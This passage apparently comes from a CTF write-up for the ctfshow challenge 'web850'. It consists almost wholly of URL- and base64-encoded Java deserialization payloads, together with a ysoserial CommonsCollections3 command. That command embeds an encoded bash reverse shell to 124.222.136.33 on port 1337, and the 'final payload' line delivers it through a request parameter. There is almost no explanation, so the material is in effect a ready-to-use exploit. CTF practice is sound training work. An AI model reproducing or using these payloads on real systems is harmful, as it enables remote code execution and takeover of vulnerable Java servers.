a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%0a%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%75%73%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%0a%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%0a%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%0a%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%0a%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%0a%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%0a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%0a%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%0a%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%0a%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%0a%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%0a%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%0a%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%0a%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%0a%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%0a%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%0a%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%0a%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%0a%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%0a%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%0a%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%0a%41%43%34%42%41%43%4a%75%59%79%41%78%4d%6a%51%75%4d%6a%49%79%4c%6a%45%7a%4e%69%34%7a%4d%79%41%78%4d%7a%4d%33%49%43%31%6c%49%43%39%69%61%57%34%76%63%32%67%67%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%0a%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%0a%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%7a%51%79%4d%44%45%35%4d%54%45%78%4d%54%41%35%4e%41%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%0a%4d%54%51%33%4e%44%49%77%4d%54%6b%78%4d%54%45%78%4d%44%6b%30%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%0a%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51%41%41%41%41%55%41%44%77%41%34%41%41%41%41%41%51%41%54%41%42%51%41%0a%41%67%41%4d%41%41%41%41%50%77%41%41%41%41%4d%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%44%51%41%44%67%41%41%41%43%41%41%41%77%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%0a%46%67%41%42%41%41%41%41%41%51%41%58%41%42%67%41%41%67%41%5a%41%41%41%41%42%41%41%42%41%42%6f%41%41%51%41%54%41%42%73%41%41%67%41%4d%41%41%41%41%53%51%41%41%41%41%51%41%41%41%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%0a%41%51%41%41%41%44%67%41%44%67%41%41%41%43%6f%41%42%41%41%41%41%41%45%41%44%77%41%34%41%41%41%41%41%41%41%42%41%42%55%41%46%67%41%42%41%41%41%41%41%51%41%63%41%42%30%41%41%67%41%41%41%41%45%41%48%67%41%66%41%41%4d%41%47%51%41%41%0a%41%41%51%41%41%51%41%61%41%41%67%41%4b%51%41%4c%41%41%45%41%44%41%41%41%41%43%51%41%41%77%41%43%41%41%41%41%44%36%63%41%41%77%46%4d%75%41%41%76%45%6a%47%32%41%44%56%58%73%51%41%41%41%41%45%41%4e%67%41%41%41%41%4d%41%41%51%4d%41%0a%41%67%41%67%41%41%41%41%41%67%41%68%41%42%45%41%41%41%41%4b%41%41%45%41%41%67%41%6a%41%42%41%41%43%58%56%78%41%48%34%41%47%41%41%41%41%64%54%4b%2f%72%71%2b%41%41%41%41%4d%67%41%62%43%67%41%44%41%42%55%48%41%42%63%48%41%42%67%48%0a%41%42%6b%42%41%42%42%7a%5a%58%4a%70%59%57%78%57%5a%58%4a%7a%61%57%39%75%56%55%6c%45%41%51%41%42%53%67%45%41%44%55%4e%76%62%6e%4e%30%59%57%35%30%56%6d%46%73%64%57%55%46%63%65%5a%70%37%6a%78%74%52%78%67%42%41%41%59%38%61%57%35%70%0a%64%44%34%42%41%41%4d%6f%4b%56%59%42%41%41%52%44%62%32%52%6c%41%51%41%50%54%47%6c%75%5a%55%35%31%62%57%4a%6c%63%6c%52%68%59%6d%78%6c%41%51%41%53%54%47%39%6a%59%57%78%57%59%58%4a%70%59%57%4a%73%5a%56%52%68%59%6d%78%6c%41%51%41%45%0a%64%47%68%70%63%77%45%41%41%30%5a%76%62%77%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4a%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%0a%5a%58%52%7a%4a%45%5a%76%62%7a%73%42%41%41%70%54%62%33%56%79%59%32%56%47%61%57%78%6c%41%51%41%4d%52%32%46%6b%5a%32%56%30%63%79%35%71%59%58%5a%68%44%41%41%4b%41%41%73%48%41%42%6f%42%41%43%4e%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%0a%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%45%5a%76%62%77%45%41%45%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%50%59%6d%70%6c%59%33%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%0a%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%41%49%51%41%43%41%41%4d%41%41%51%41%45%41%41%45%41%0a%47%67%41%46%41%41%59%41%41%51%41%48%41%41%41%41%41%67%41%49%41%41%45%41%41%51%41%4b%41%41%73%41%41%51%41%4d%41%41%41%41%4c%77%41%42%41%41%45%41%41%41%41%46%4b%72%63%41%41%62%45%41%41%41%41%43%41%41%30%41%41%41%41%47%41%41%45%41%0a%41%41%41%38%41%41%34%41%41%41%41%4d%41%41%45%41%41%41%41%46%41%41%38%41%45%67%41%41%41%41%49%41%45%77%41%41%41%41%49%41%46%41%41%52%41%41%41%41%43%67%41%42%41%41%49%41%46%67%41%51%41%41%6c%77%64%41%41%45%55%48%64%75%63%6e%42%33%0a%41%51%42%34%63%33%49%41%45%57%70%68%64%6d%45%75%62%47%46%75%5a%79%35%4a%62%6e%52%6c%5a%32%56%79%45%75%4b%67%70%50%65%42%68%7a%67%43%41%41%46%4a%41%41%56%32%59%57%78%31%5a%58%68%79%41%42%42%71%59%58%5a%68%4c%6d%78%68%62%6d%63%75%0a%54%6e%56%74%59%6d%56%79%68%71%79%56%48%51%75%55%34%49%73%43%41%41%42%34%63%41%41%41%41%41%46%34%0a

web850">web850

java -jar ysoserial.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}"|base64

最终payload:

ctfshow>ctfshow=%72%4f%30%41%42%58%4e%79%41%44%4a%7a%64%57%34%75%63%6d%56%6d%62%47%56%6a%64%43%35%68%62%6d%35%76%64%47%46%30%61%57%39%75%4c%6b%46%75%62%6d%39%30%59%58%52%70%62%32%35%4a%62%6e%5a%76%59%32%46%30%61%57%39%75%53%47%46%75%5a%47%78%6c%63%6c%58%4b%39%51%38%56%79%33%36%6c%41%67%41%43%54%41%41%4d%62%57%56%74%59%6d%56%79%56%6d%46%73%64%57%56%7a%64%41%41%50%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%4e%59%58%41%37%54%41%41%45%64%48%6c%77%5a%58%51%41%45%55%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%51%32%78%68%63%33%4d%37%65%48%42%7a%66%51%41%41%41%41%45%41%44%57%70%68%64%6d%45%75%64%58%52%70%62%43%35%4e%59%58%42%34%63%67%41%58%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6e%4a%6c%5a%6d%78%6c%59%33%51%75%55%48%4a%76%65%48%6e%68%4a%39%6f%67%7a%42%42%44%79%77%49%41%41%55%77%41%41%57%68%30%41%43%56%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%33%4a%6c%5a%6d%78%6c%59%33%51%76%53%57%35%32%62%32%4e%68%64%47%6c%76%62%6b%68%68%62%6d%52%73%5a%58%49%37%65%48%42%7a%63%51%42%2b%41%41%42%7a%63%67%41%71%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%31%68%63%43%35%4d%59%58%70%35%54%57%46%77%62%75%57%55%67%70%35%35%45%4a%51%44%41%41%46%4d%41%41%64%6d%59%57%4e%30%62%33%4a%35%64%41%41%73%54%47%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%59%32%39%74%62%57%39%75%63%79%39%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%39%55%63%6d%46%75%63%32%5a%76%63%6d%31%6c%63%6a%74%34%63%48%4e%79%41%44%70%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%5a%6e%56%75%59%33%52%76%63%6e%4d%75%51%32%68%68%61%57%35%6c%5a%46%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4d%4d%65%58%37%43%68%36%6c%77%51%43%41%41%46%62%41%41%31%70%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%7a%64%41%41%74%57%30%78%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%32%4e%76%62%57%31%76%62%6e%4d%76%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%76%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%65%48%42%31%63%67%41%74%57%30%78%76%63%6d%63%75%59%58%42%68%59%32%68%6c%4c%6d%4e%76%62%57%31%76%62%6e%4d%75%59%32%39%73%62%47%56%6a%64%47%6c%76%62%6e%4d%75%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%49%37%76%56%59%71%38%64%67%30%47%4a%6b%43%41%41%42%34%63%41%41%41%41%41%4a%7a%63%67%41%37%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%6a%62%32%31%74%62%32%35%7a%4c%6d%4e%76%62%47%78%6c%59%33%52%70%62%32%35%7a%4c%6d%5a%31%62%6d%4e%30%62%33%4a%7a%4c%6b%4e%76%62%6e%4e%30%59%57%35%30%56%48%4a%68%62%6e%4e%6d%62%33%4a%74%5a%58%4a%59%64%70%41%52%51%51%4b%78%6c%41%49%41%41%55%77%41%43%57%6c%44%62%32%35%7a%64%47%46%75%64%48%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%54%32%4a%71%5a%57%4e%30%4f%33%68%77%64%6e%49%41%4e%32%4e%76%62%53%35%7a%64%57%34%75%62%33%4a%6e%4c%6d%46%77%59%57%4e%6f%5a%53%35%34%59%57%78%68%62%69%35%70%62%6e%52%6c%63%6d%35%68%62%43%35%34%63%32%78%30%59%79%35%30%63%6d%46%34%4c%6c%52%79%51%56%68%47%61%57%78%30%5a%58%49%41%41%41%41%41%41%41%41%41%41%41%41%41%41%48%68%77%63%33%49%41%50%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%59%32%39%74%62%57%39%75%63%79%35%6a%62%32%78%73%5a%57%4e%30%61%57%39%75%63%79%35%6d%64%57%35%6a%64%47%39%79%63%79%35%4a%62%6e%4e%30%59%57%35%30%61%57%46%30%5a%56%52%79%59%57%35%7a%5a%6d%39%79%62%57%56%79%4e%49%76%30%66%36%53%47%30%44%73%43%41%41%4a%62%41%41%56%70%51%58%4a%6e%63%33%51%41%45%31%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%39%69%61%6d%56%6a%64%44%74%62%41%41%74%70%55%47%46%79%59%57%31%55%65%58%42%6c%63%33%51%41%45%6c%74%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%30%4e%73%59%58%4e%7a%4f%33%68%77%64%58%49%41%45%31%74%4d%61%6d%46%32%59%53%35%73%59%57%35%6e%4c%6b%39%69%61%6d%56%6a%64%44%75%51%7a%6c%69%66%45%48%4d%70%62%41%49%41%41%48%68%77%41%41%41%41%41%58%4e%79%41%44%70%6a%62%32%30%75%63%33%56%75%4c%6d%39%79%5a%79%35%68%63%47%46%6a%61%47%55%75%65%47%46%73%59%57%34%75%61%57%35%30%5a%58%4a%75%59%57%77%75%65%48%4e%73%64%47%4d%75%64%48%4a%68%65%43%35%55%5a%57%31%77%62%47%46%30%5a%58%4e%4a%62%58%42%73%43%56%64%50%77%57%36%73%71%7a%4d%44%41%41%5a%4a%41%41%31%66%61%57%35%6b%5a%57%35%30%54%6e%56%74%59%6d%56%79%53%51%41%4f%58%33%52%79%59%57%35%7a%62%47%56%30%53%57%35%6b%5a%58%68%62%41%41%70%66%59%6e%6c%30%5a%57%4e%76%5a%47%56%7a%64%41%41%44%57%31%74%43%57%77%41%47%58%32%4e%73%59%58%4e%7a%63%51%42%2b%41%42%68%4d%41%41%56%66%62%6d%46%74%5a%58%51%41%45%6b%78%71%59%58%5a%68%4c%32%78%68%62%6d%63%76%55%33%52%79%61%57%35%6e%4f%30%77%41%45%56%39%76%64%58%52%77%64%58%52%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%64%41%41%57%54%47%70%68%64%6d%45%76%64%58%52%70%62%43%39%51%63%6d%39%77%5a%58%4a%30%61%57%56%7a%4f%33%68%77%41%41%41%41%41%50%2f%2f%2f%2f%39%31%63%67%41%44%57%31%74%43%53%2f%30%5a%46%57%64%6e%32%7a%63%43%41%41%42%34%63%41%41%41%41%41%4a%31%63%67%41%43%57%30%4b%73%38%78%66%34%42%67%68%55%34%41%49%41%41%48%68%77%41%41%41%47%2b%63%72%2b%75%72%34%41%41%41%41%79%41%44%6b%4b%41%41%4d%41%49%67%63%41%4e%77%63%41%4a%51%63%41%4a%67%45%41%45%48%4e%6c%63%6d%6c%68%62%46%5a%6c%63%6e%4e%70%62%32%35%56%53%55%51%42%41%41%46%4b%41%51%41%4e%51%32%39%75%63%33%52%68%62%6e%52%57%59%57%78%31%5a%51%57%74%49%4a%50%7a%6b%64%33%76%50%67%45%41%42%6a%78%70%62%6d%6c%30%50%67%45%41%41%79%67%70%56%67%45%41%42%45%4e%76%5a%47%55%42%41%41%39%4d%61%57%35%6c%54%6e%56%74%59%6d%56%79%56%47%46%69%62%47%55%42%41%42%4a%4d%62%32%4e%68%62%46%5a%68%63%6d%6c%68%59%6d%78%6c%56%47%46%69%62%47%55%42%41%41%52%30%61%47%6c%7a%41%51%41%54%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%44%45%6c%75%62%6d%56%79%51%32%78%68%63%33%4e%6c%63%77%45%41%4e%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%63%47%46%35%62%47%39%68%5a%48%4d%76%64%58%52%70%62%43%39%48%59%57%52%6e%5a%58%52%7a%4a%46%4e%30%64%57%4a%55%63%6d%46%75%63%32%78%6c%64%46%42%68%65%57%78%76%59%57%51%37%41%51%41%4a%64%48%4a%68%62%6e%4e%6d%62%33%4a%74%41%51%42%79%4b%45%78%6a%62%32%30%76%63%33%56%75%4c%32%39%79%5a%79%39%68%63%47%46%6a%61%47%55%76%65%47%46%73%59%57%34%76%61%57%35%30%5a%58%4a%75%59%57%77%76%65%48%4e%73%64%47%4d%76%52%45%39%4e%4f%31%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%5a%47%39%6a%64%57%31%6c%62%6e%51%42%41%43%31%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%68%62%47%46%75%4c%32%6c%75%64%47%56%79%62%6d%46%73%4c%33%68%7a%62%48%52%6a%4c%30%52%50%54%54%73%42%41%41%68%6f%59%57%35%6b%62%47%56%79%63%77%45%41%51%6c%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6b%56%34%59%32%56%77%64%47%6c%76%62%6e%4d%48%41%43%63%42%41%4b%59%6f%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%45%54%30%30%37%54%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%62%57%77%76%61%57%35%30%5a%58%4a%75%59%57%77%76%5a%48%52%74%4c%30%52%55%54%55%46%34%61%58%4e%4a%64%47%56%79%59%58%52%76%63%6a%74%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%79%6c%57%41%51%41%49%61%58%52%6c%63%6d%46%30%62%33%49%42%41%44%56%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%6b%64%47%30%76%52%46%52%4e%51%58%68%70%63%30%6c%30%5a%58%4a%68%64%47%39%79%4f%77%45%41%42%32%68%68%62%6d%52%73%5a%58%49%42%41%45%46%4d%59%32%39%74%4c%33%4e%31%62%69%39%76%63%6d%63%76%59%58%42%68%59%32%68%6c%4c%33%68%74%62%43%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%7a%5a%58%4a%70%59%57%78%70%65%6d%56%79%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%58%52%70%62%32%35%49%59%57%35%6b%62%47%56%79%4f%77%45%41%43%6c%4e%76%64%58%4a%6a%5a%55%5a%70%62%47%55%42%41%41%78%48%59%57%52%6e%5a%58%52%7a%4c%6d%70%68%64%6d%45%4d%41%41%6f%41%43%77%63%41%4b%41%45%41%4d%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%6b%55%33%52%31%59%6c%52%79%59%57%35%7a%62%47%56%30%55%47%46%35%62%47%39%68%5a%41%45%41%51%47%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%79%64%57%35%30%61%57%31%6c%4c%30%46%69%63%33%52%79%59%57%4e%30%56%48%4a%68%62%6e%4e%73%5a%58%51%42%41%42%52%71%59%58%5a%68%4c%32%6c%76%4c%31%4e%6c%63%6d%6c%68%62%47%6c%36%59%57%4a%73%5a%51%45%41%4f%57%4e%76%62%53%39%7a%64%57%34%76%62%33%4a%6e%4c%32%46%77%59%57%4e%6f%5a%53%39%34%59%57%78%68%62%69%39%70%62%6e%52%6c%63%6d%35%68%62%43%39%34%63%32%78%30%59%79%39%55%63%6d%46%75%63%32%78%6c%64%45%56%34%59%32%56%77%64%47%6c%76%62%67%45%41%48%33%6c%7a%62%33%4e%6c%63%6d%6c%68%62%43%39%77%59%58%6c%73%62%32%46%6b%63%79%39%31%64%47%6c%73%4c%30%64%68%5a%47%64%6c%64%48%4d%42%41%41%67%38%59%32%78%70%62%6d%6c%30%50%67%45%41%45%57%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%42%77%41%71%41%51%41%4b%5a%32%56%30%55%6e%56%75%64%47%6c%74%5a%51%45%41%46%53%67%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%53%64%57%35%30%61%57%31%6c%4f%77%77%41%4c%41%41%74%43%67%41%72%41%43%34%42%41%47%46%69%59%58%4e%6f%49%43%31%6a%49%48%74%6c%59%32%68%76%4c%46%6c%74%52%6e%70%68%51%30%46%30%59%56%4e%42%4b%30%70%70%51%58%5a%61%52%31%59%79%54%44%4e%53%61%6d%4e%44%4f%48%68%4e%61%6c%46%31%54%57%70%4a%65%55%78%71%52%58%70%4f%61%54%52%36%54%58%6b%34%65%45%31%36%54%54%4e%4a%52%45%45%72%53%6d%70%46%50%58%31%38%65%32%4a%68%63%32%55%32%4e%43%77%74%5a%48%31%38%65%32%4a%68%63%32%67%73%4c%57%6c%39%43%41%41%77%41%51%41%45%5a%58%68%6c%59%77%45%41%4a%79%68%4d%61%6d%46%32%59%53%39%73%59%57%35%6e%4c%31%4e%30%63%6d%6c%75%5a%7a%73%70%54%47%70%68%64%6d%45%76%62%47%46%75%5a%79%39%51%63%6d%39%6a%5a%58%4e%7a%4f%77%77%41%4d%67%41%7a%43%67%41%72%41%44%51%42%41%41%31%54%64%47%46%6a%61%30%31%68%63%46%52%68%59%6d%78%6c%41%51%41%66%65%58%4e%76%63%32%56%79%61%57%46%73%4c%31%42%33%62%6d%56%79%4d%54%45%30%4e%44%63%78%4d%6a%51%35%4d%7a%41%32%4d%54%45%34%4d%67%45%41%49%55%78%35%63%32%39%7a%5a%58%4a%70%59%57%77%76%55%48%64%75%5a%58%49%78%4d%54%51%30%4e%7a%45%79%4e%44%6b%7a%4d%44%59%78%4d%54%67%79%4f%77%41%68%41%41%49%41%41%77%41%42%41%41%51%41%41%51%41%61%41%41%55%41%42%67%41%42%41%41%63%41%41%41%41%43%41%41%67%41%42%41%41%42%41%41%6f%41%43%77%41%42%41%41%77%41%41%41%41%76%41%41%45%41%41%51%41%41%41%41%55%71%74%77%41%42%73%51%41%41%41%41%49%41%44%51%41%41%41%41%59%41%41%51%41%41%41%43%38%41%44%67%41%41%41%41%77%41%41%51